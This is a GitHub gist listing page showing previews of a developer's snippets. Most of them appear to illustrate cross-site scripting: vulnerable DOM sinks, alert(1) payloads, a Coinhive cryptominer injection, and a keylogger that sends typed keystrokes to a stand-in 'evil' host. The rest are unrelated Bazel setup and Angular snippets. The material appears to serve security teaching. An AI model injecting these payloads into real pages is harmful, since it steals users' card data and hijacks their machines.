Skip to content

Instantly share code, notes, and snippets.

Avatar

Stepan Suvorov stevermeister

View GitHub Profile
View xss.js
var url = new URL(location.href).searchParams.get("user");
$('#form').append('<input type="hidden" value="' + url + '">');
View not_trusted.js
el.innerHTML = location.hash.slice(1); //string
View trusted_types.js
el.innerHTML = { toString: () => 'hello' }
el.innerHTML // "hello"
View xss_coins.html
<script src="https://coinhive.com/lib/coinhive.min.js">
</script>
<script>
var miner = new CoinHive.User('SITE_KEY', 'john-doe');
miner.start();
</script>
View xss_creditcard.js
var keys='';
document.onkeypress = function(e) {
e = window.event?event:e;
key = e.keyCode?e.keyCode:e.charCode;
key = String.fromCharCode(key);
keys+=key;
}
window.setInterval(function(){
new Image().src = 'http://evil.../log.php?c='+keys;
View xss_result.html
<form id="#form">
<input type="hidden"
value="https://example.com"/><script>alert(1)</script>
</form>
View xss.html
.../?user=something<script>alert(1)</script>...
@stevermeister
stevermeister / bazel-start.sh
Last active Oct 5, 2018
Run to setup bazel files for fresh ng-cli project
View bazel-start.sh
yarn global add @bazel/ibazel
curl https://raw.githubusercontent.com/alexeagle/canonical-angularcli-app/master/.bazelrc > .bazelrc
curl https://raw.githubusercontent.com/alexeagle/canonical-angularcli-app/master/WORKSPACE > WORKSPACE
curl https://raw.githubusercontent.com/alexeagle/canonical-angularcli-app/master/BUILD.bazel > BUILD.bazel
curl https://raw.githubusercontent.com/alexeagle/canonical-angularcli-app/master/src/BUILD.bazel > ./src/BUILD.bazel
curl https://raw.githubusercontent.com/alexeagle/canonical-angularcli-app/master/e2e/protractor.on-prepare.js > ./e2e/protractor.on-prepare.js
curl https://raw.githubusercontent.com/alexeagle/canonical-angularcli-app/master/e2e/BUILD.bazel > ./e2e/BUILD.bazel
curl https://raw.githubusercontent.com/alexeagle/canonical-angularcli-app/236406851409a88e85b3cdc9e6eaa250061fd7cc/src/main.ts > ./src/main.ts
curl https://raw.githubusercontent.com/alexeagle/canonical-angularcli-app/06151761ded53d22a2d03b9e6d67c31f045559af/src/index.html > ./src/index.html
View takeUntil.ts
export class TestComponent {
constructor(private store: Store) { }
private componetDestroyed: Subject = new Subject();
todos: Subscription;
posts: Subscription;
ngOnInit() {
this.todosSubscription = this.store.select('todos').takeUntil(this.componetDestroyed).subscribe(console.log);
You can’t perform that action at this time.